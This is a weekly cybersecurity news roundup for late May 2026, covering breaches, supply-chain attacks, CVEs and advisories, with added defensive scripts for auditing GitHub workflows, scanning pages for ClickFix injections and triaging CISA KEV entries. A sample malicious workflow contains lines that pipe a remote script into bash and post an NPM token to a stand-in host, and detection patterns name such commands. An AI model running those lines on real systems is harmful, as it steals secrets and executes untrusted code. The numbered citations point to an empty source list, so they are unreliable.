
Cybersecurity Week in Review: May 19, 2026 – May 25, 2026

Cyberattacks, data breaches, zero-days, and global responses—discover the biggest cybersecurity headlines of this week.

Overview

This week in cybersecurity was marked by a surge in high-profile data breaches, sophisticated cyberattacks leveraging both zero-day vulnerabilities and advanced social engineering, and a wave of critical vulnerability disclosures affecting widely used platforms. Government agencies and industry leaders responded with urgent advisories and rapid patching efforts, while the global cybersecurity community convened at major conferences to address the evolving threat landscape.


Major Data Breaches

GitHub Breach: 4,000+ Internal Repositories Exposed

GitHub, the world’s largest code hosting platform, confirmed a significant breach in which attackers accessed and exfiltrated over 4,000 internal repositories. The attack, attributed to the Team PCP ransomware group, exposed sensitive source code and internal documentation. GitHub has not disclosed the full extent of the data compromised, but the breach has raised concerns about the security of collaborative development environments and the potential for downstream supply chain attacks. The company is working with law enforcement and has urged users to review their own repository security settings [1].

Foxconn Ransomware Attack: 8TB of Data Stolen

Foxconn’s North American facility was hit by the Nitrogen ransomware group, resulting in the theft of over 8 terabytes of data, including 11 million files with confidential information, internal project documentation, and technical drawings. The attackers have reportedly begun leaking samples of the stolen data to pressure the company into paying a ransom. This incident underscores the persistent targeting of manufacturing and supply chain organizations by ransomware operators [1].

Canvas Data Breach: 9,000 Institutions Impacted

A massive breach of the Canvas learning management system affected nearly 9,000 educational institutions worldwide, including Harvard, Stanford, UC Berkeley, and the National University of Singapore. The ShinyHunters group is believed to be behind the attack, which exposed a range of personal and academic data. Investigations are ongoing to determine the full scope of the compromise [1].

NVIDIA GeForce NOW Partner Breach

A partner of NVIDIA’s GeForce NOW cloud gaming service in Armenia suffered a breach attributed to the ShinyHunters group. The attackers accessed a user database containing names, email addresses, usernames, dates of birth, membership details, and two-factor authentication status. The quantity of data exposed is still under investigation [1].


Significant Cyberattacks

GitHub Supply Chain Attack: Megalodon Campaign

Over 5,500 GitHub repositories were compromised in a large-scale supply chain attack dubbed “Megalodon.” Attackers used automated commits to inject malicious GitHub Actions workflows; because a workflow runs with the repository’s secrets and its GITHUB_TOKEN, such an injection can execute arbitrary code and exfiltrate credentials on every triggered run, exposing numerous open-source projects and their downstream consumers. The campaign highlights the growing risk of automated attacks on software supply chains [2].
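The patterns a workflow injection of this kind relies on are easy to scan for. The script below is an added example, not code from GitHub or from any report on the Megalodon campaign: it walks a workflow file line by line (no YAML parser needed) and flags actions not pinned to a full commit SHA, untrusted pull-request code checked out under the privileged `pull_request_target` trigger, remote scripts piped straight into a shell, secrets handed to a network client, and long base64-looking blobs. Both sample workflows are constructed; the commit SHAs in the clean one are placeholders of the right shape, not real pins, and `example.invalid` is a reserved name.

```python
"""Heuristic audit of GitHub Actions workflow text for workflow-injection patterns.
Added example (not GitHub's code); rules and samples are assumptions described above."""
import re
from dataclasses import dataclass
from typing import List

SHA40 = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r'''^\s*-?\s*uses:\s*["']?([^\s"'#]+)''')
PR_TARGET_RE = re.compile(r"\bpull_request_target\b")
PR_HEAD_REF_RE = re.compile(r"github\.event\.pull_request\.head")
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")
SECRET_TO_NET_RE = re.compile(r"\b(curl|wget)\b[^\n]*\$\{\{\s*secrets\.")
BASE64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


@dataclass
class Finding:
    line: int
    rule: str
    detail: str


def audit_workflow(text: str) -> List[Finding]:
    """Return one Finding per suspicious line; an empty list means no hits."""
    findings: List[Finding] = []
    lines = text.splitlines()
    # pull_request_target runs with write permissions and secrets even for PRs
    # from forks, so checking out the PR head under it is the classic "pwn request".
    privileged_pr_trigger = any(PR_TARGET_RE.search(l) for l in lines)
    for n, line in enumerate(lines, 1):
        m = USES_RE.match(line)
        if m:
            ref = m.group(1)
            # local (./path) and docker:// references are not tag-pinned actions
            if not ref.startswith(("./", "docker://")):
                _, _, version = ref.partition("@")
                if not SHA40.match(version):  # tags/branches can be moved by an attacker
                    findings.append(Finding(n, "unpinned-action", ref))
        if privileged_pr_trigger and PR_HEAD_REF_RE.search(line):
            findings.append(Finding(n, "pr-target-checks-out-fork", line.strip()))
        if PIPE_TO_SHELL_RE.search(line):
            findings.append(Finding(n, "pipe-to-shell", line.strip()))
        if SECRET_TO_NET_RE.search(line):
            findings.append(Finding(n, "secret-to-network", line.strip()))
        if BASE64_BLOB_RE.search(line):
            findings.append(Finding(n, "encoded-blob", line.strip()[:60] + "..."))
    return findings


# Constructed sample: a clean workflow (SHAs are shape-correct placeholders).
GOOD_WORKFLOW = """\
name: CI
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608
      - uses: actions/setup-node@1e60f620b9541d16bece96c5465dc8ee9832be0b
        with:
          node-version: 20
      - run: npm ci && npm test
"""

# Constructed sample: the shape of an injected workflow (payload host is a reserved name).
BAD_WORKFLOW = """\
name: CI
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: setup
        run: |
          curl -fsSL https://example.invalid/setup.sh | bash
          curl -X POST -d "token=${{ secrets.NPM_TOKEN }}" https://example.invalid/collect
"""

if __name__ == "__main__":
    for name, wf in (("good", GOOD_WORKFLOW), ("bad", BAD_WORKFLOW)):
        for f in audit_workflow(wf):
            print(f"{name}:{f.line}: {f.rule}: {f.detail}")
```

Run it over `.github/workflows/*.yml` across an organization and diff the output against the last known-good commit; a sudden wave of `unpinned-action` or `pipe-to-shell` hits across many repositories is exactly the signal an automated-commit campaign produces. The rules are heuristics and will produce false positives (a legitimate `curl | sh` installer, for instance), so treat hits as review queue entries, not verdicts.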

German Hospitals Targeted

A coordinated cyberattack targeted multiple hospitals in Germany, disrupting patient care and forcing some facilities to divert emergency cases. The attack vector and attribution remain under investigation, but early reports suggest ransomware was involved. The incident has prompted renewed calls for improved healthcare cybersecurity [3].

State-Sponsored APTs Deploy Linux Backdoors Against Central Asia Telecoms

Chinese APT groups were observed deploying Linux backdoors in attacks against telecommunications providers in Central Asia. These campaigns are part of a broader trend of state-sponsored cyber-espionage targeting critical infrastructure and communications networks [4].


Critical Vulnerabilities

Ghost CMS CVE-2026-26980: 700+ Sites Hijacked

A critical SQL injection vulnerability (CVE-2026-26980, CVSS 9.4) in Ghost CMS was exploited to hijack over 700 websites. The flaw allowed unauthenticated attackers to obtain admin API keys and modify site content; attackers used that access to inject malicious JavaScript that drives “ClickFix” lures, tricking visitors into executing payloads that could compromise their systems. Ghost CMS users are urged to update to version 6.19.1 or later, audit site content and theme files for injected scripts, and rotate any admin API keys that may have been exposed [5].
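Auditing for this kind of compromise means looking at what the site actually serves. The scanner below is an added example, not Ghost’s code and not derived from the CVE-2026-26980 exploit: it parses a rendered page with the standard library’s HTML parser and reports external script tags from hosts outside an allowlist, inline scripts that stage a clipboard payload or decode-and-execute a blob, and ClickFix-style instruction text. The allowlist, the suspicious-script patterns and the lure phrases are assumptions a site owner would tune; both sample pages are constructed and `example.invalid` is a reserved name.

```python
"""Scan rendered HTML for injected third-party scripts and ClickFix lures.
Added example (not Ghost's code); heuristics and samples are assumptions described above."""
import re
from html.parser import HTMLParser
from typing import List, Set, Tuple
from urllib.parse import urlparse

INLINE_SUSPICIOUS = [
    re.compile(r"navigator\.clipboard\.writeText\("),  # stages the command the lure asks users to paste
    re.compile(r"eval\(\s*atob\("),                    # decode-then-execute loader
    re.compile(r"document\.write\(\s*unescape\("),     # obfuscated DOM injection
]
# Assumed lure phrases; ClickFix pages tell the victim to open Run and paste a command.
CLICKFIX_PHRASES = ["win+r", "windows+r", "ctrl+v", "verify you are human", "paste the command"]


class ScriptCollector(HTMLParser):
    """Collects external script sources, inline script bodies and visible text with line numbers."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[Tuple[int, str]] = []
        self.inline: List[Tuple[int, str]] = []
        self.text: List[str] = []
        self._script_start = None  # line number while inside an inline <script>
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append((self.getpos()[0], src))
        else:
            self._script_start, self._buf = self.getpos()[0], []

    def handle_endtag(self, tag):
        if tag == "script" and self._script_start is not None:
            self.inline.append((self._script_start, "".join(self._buf)))
            self._script_start = None

    def handle_data(self, data):
        (self._buf if self._script_start is not None else self.text).append(data)


def audit_page(html: str, allowed_hosts: Set[str]) -> List[Tuple[int, str, str]]:
    """Return (line, rule, detail) findings; line 0 marks page-wide text findings."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings: List[Tuple[int, str, str]] = []
    for line, src in p.external:
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:  # relative src is same-origin
            findings.append((line, "unknown-script-host", src))
    for line, code in p.inline:
        for pat in INLINE_SUSPICIOUS:
            if pat.search(code):
                findings.append((line, "suspicious-inline-script", pat.pattern))
                break
    page_text = re.sub(r"\s+", " ", " ".join(p.text)).lower()
    for phrase in CLICKFIX_PHRASES:
        if phrase in page_text:
            findings.append((0, "clickfix-lure-text", phrase))
    return findings


ALLOWED_HOSTS = {"cdn.jsdelivr.net"}  # assumed per-site allowlist of script hosts

CLEAN_PAGE = """<html><head><title>Blog</title>
<script src="/assets/built/casper.js"></script>
<script src="https://cdn.jsdelivr.net/npm/some-lib@1/dist/x.js"></script>
</head><body><article><h1>Hello</h1><p>Welcome to the blog.</p></article>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>"""

INJECTED_PAGE = """<html><head><title>Blog</title>
<script src="/assets/built/casper.js"></script>
<script src="https://cdn.example.invalid/verify.js"></script>
</head><body><article><h1>Hello</h1><p>Welcome to the blog.</p></article>
<div id="verify"><p>To verify you are human: press Win+R, then Ctrl+V and Enter.</p></div>
<script>
  document.getElementById("verify").onclick = function () {
    navigator.clipboard.writeText("REDACTED-COMMAND");  // payload omitted in this sample
  };
</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        for line, rule, detail in audit_page(page, ALLOWED_HOSTS):
            print(f"{name}:{line}: {rule}: {detail}")
```

Point it at the HTML your own site returns to an unauthenticated visitor (fetched, not read from disk, since injected content may live in the database rather than in theme files), and also at the raw post and code-injection settings Ghost stores. Lures rendered purely by JavaScript will show up only as the external or inline script finding, not as lure text.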

cPanel CVE-2026-41940: Mass Exploitation and Ransomware

A critical authentication bypass in cPanel and WHM (CVE-2026-41940, CVSS 9.8) has been mass-exploited since February 2026. Attackers leveraged a CRLF injection flaw to gain root access, deploy “SORRY” ransomware, and conscript servers into Mirai botnets. Over 1.5 million internet-facing cPanel instances were at risk, with at least 44,000 confirmed compromises. Immediate patching and credential rotation are mandatory [6].

Windows Zero-Days: YellowKey, GreenPlasma, MiniPlasma

A security researcher known as “Nightmare Eclipse” disclosed three new Windows zero-days:

  • YellowKey: Allows attackers with physical access to bypass BitLocker encryption using a USB device.
  • GreenPlasma: Enables local privilege escalation to SYSTEM on Windows 10/11 and Server.
  • MiniPlasma: Re-exploits a flaw that was previously patched as CVE-2020-17103 to gain full system control.

Microsoft is investigating and has patched some related vulnerabilities, but several remain unaddressed. Organizations are advised to implement application allowlisting and containment strategies [7].

Microsoft Defender Exploits: CVE-2026-41091 and CVE-2026-45498

Two actively exploited vulnerabilities in Microsoft Defender were disclosed:

  • CVE-2026-41091 (CVSS 7.8): Privilege escalation via improper link resolution.
  • CVE-2026-45498 (CVSS 4.0): Denial-of-service bug.

Both have been patched in the latest Defender Antimalware Platform updates. CISA has added these to its Known Exploited Vulnerabilities catalog, requiring urgent remediation [8].

Other Notable CVEs

  • CVE-2026-24207: NVIDIA Triton Inference Server authentication flaw (CVSS 9.8).
  • CVE-2026-8153: Universal Robots PolyScope 5 OS command injection.
  • CVE-2026-5281: Google Chrome use-after-free in Dawn, Chromium’s WebGPU implementation, exploited in the wild.

Government Responses

CISA and International Advisories

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued multiple alerts, adding new vulnerabilities to its Known Exploited Vulnerabilities catalog and setting federal remediation deadlines. CISA emphasized the need for rapid patching of cPanel, Windows, and Defender vulnerabilities, and highlighted the ongoing threat from ransomware and state-sponsored actors [9].
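KEV additions only help if they are matched against what you actually run. The script below is an added example, not CISA tooling: it indexes the KEV catalog JSON by CVE, joins it to a vulnerability-scanner export, and ranks hosts by whether the federal due date has already passed, whether CISA marks the entry as used in ransomware campaigns, and how many days remain. The KEV feed is real and published at the URL in `KEV_URL`; `SAMPLE_KEV` is a constructed extract in the feed’s JSON shape that reuses the CVE IDs named on this page with assumed `dateAdded` and `dueDate` values, and the inventory and `DEMO_TODAY` are likewise constructed.

```python
"""Join a scanner export to the CISA KEV catalog and rank remediation order.
Added example (not CISA tooling); sample catalog, inventory and date are constructed."""
import json
from datetime import date
from typing import Dict, List
from urllib.request import urlopen

KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed extract in the KEV feed's shape; dates are assumed for illustration.
SAMPLE_KEV = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "sample",
    "count": 3,
    "vulnerabilities": [
        {"cveID": "CVE-2026-41940", "vendorProject": "cPanel", "product": "cPanel & WHM",
         "dateAdded": "2026-05-20", "dueDate": "2026-05-27", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2026-41091", "vendorProject": "Microsoft", "product": "Defender",
         "dateAdded": "2026-05-21", "dueDate": "2026-06-11", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-5281", "vendorProject": "Google", "product": "Chromium",
         "dateAdded": "2026-05-19", "dueDate": "2026-06-09", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed scanner output: each host with the CVE IDs the scanner reported.
# "CVE-2025-00000" is a placeholder for a finding that is not in KEV.
INVENTORY = [
    {"host": "web-01", "cves": ["CVE-2026-41940", "CVE-2025-00000"]},
    {"host": "wks-17", "cves": ["CVE-2026-41091", "CVE-2026-5281"]},
    {"host": "db-02", "cves": ["CVE-2025-00000"]},
]
DEMO_TODAY = date(2026, 5, 28)  # assumed "today" so the cPanel due date is already past


def index_kev(raw_json: str) -> Dict[str, dict]:
    """Map cveID -> catalog entry for O(1) lookups."""
    return {v["cveID"]: v for v in json.loads(raw_json)["vulnerabilities"]}


def fetch_kev(url: str = KEV_URL) -> Dict[str, dict]:
    """Live download of the catalog (network call; the offline demo uses SAMPLE_KEV)."""
    with urlopen(url, timeout=30) as resp:
        return index_kev(resp.read().decode("utf-8"))


def triage(inventory: List[dict], kev: Dict[str, dict], today: date) -> List[dict]:
    """Return KEV-listed findings sorted: overdue first, then ransomware-linked, then soonest due."""
    rows: List[dict] = []
    for asset in inventory:
        for cve in asset["cves"]:
            entry = kev.get(cve)
            if entry is None:
                continue  # not in KEV: still a vulnerability, just not what this ranking covers
            days_left = (date.fromisoformat(entry["dueDate"]) - today).days
            rows.append({
                "host": asset["host"], "cve": cve, "product": entry["product"],
                "ransomware": entry["knownRansomwareCampaignUse"] == "Known",
                "due": entry["dueDate"], "days_left": days_left, "overdue": days_left < 0,
            })
    rows.sort(key=lambda r: (not r["overdue"], not r["ransomware"], r["days_left"]))
    return rows


def demo() -> List[dict]:
    return triage(INVENTORY, index_kev(SAMPLE_KEV), DEMO_TODAY)


if __name__ == "__main__":
    for r in demo():
        flag = "OVERDUE" if r["overdue"] else f"{r['days_left']:>3}d"
        rw = "ransomware" if r["ransomware"] else ""
        print(f"{flag:8} {r['host']:8} {r['cve']:16} {r['product']:14} due {r['due']} {rw}")
```

The federal due dates bind only U.S. federal civilian agencies, but they are a useful external clock for everyone else, and `knownRansomwareCampaignUse` is the field to sort on when the queue is longer than the patch window. Swap `SAMPLE_KEV` for `fetch_kev()` and the inventory for your scanner’s export to run this for real.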

Microsoft and Vendor Actions

Microsoft released out-of-band updates for Defender and is investigating the latest zero-day disclosures. Cisco, NVIDIA, and other vendors published advisories and patches for critical vulnerabilities affecting their products [10].


Miscellaneous & Industry Events

Global Cybersecurity Conferences

The week saw a packed calendar of international cybersecurity conferences, including the World Conference on Cyber Security and Ethical Hacking (WCCSEH) in Kyoto and Macau, and the International Conference on Cybersecurity, Cybercrimes, and Smart Emerging Technologies (ICCCSET) in multiple global locations. These events focused on AI-driven threats, supply chain security, and the convergence of data protection and AI governance [11].

AI and Vulnerability Discovery

Anthropic’s “Mythos” project and other AI-driven initiatives have accelerated the discovery of thousands of vulnerabilities across open-source projects, sparking debate about the balance between rapid disclosure and responsible remediation [12].


Conclusion

This week’s developments highlight the relentless pace of cyber threats, the critical importance of rapid vulnerability management, and the need for coordinated industry and government responses. Organizations are urged to prioritize patching, enhance supply chain security, and stay informed through trusted advisories and professional events.


Sources: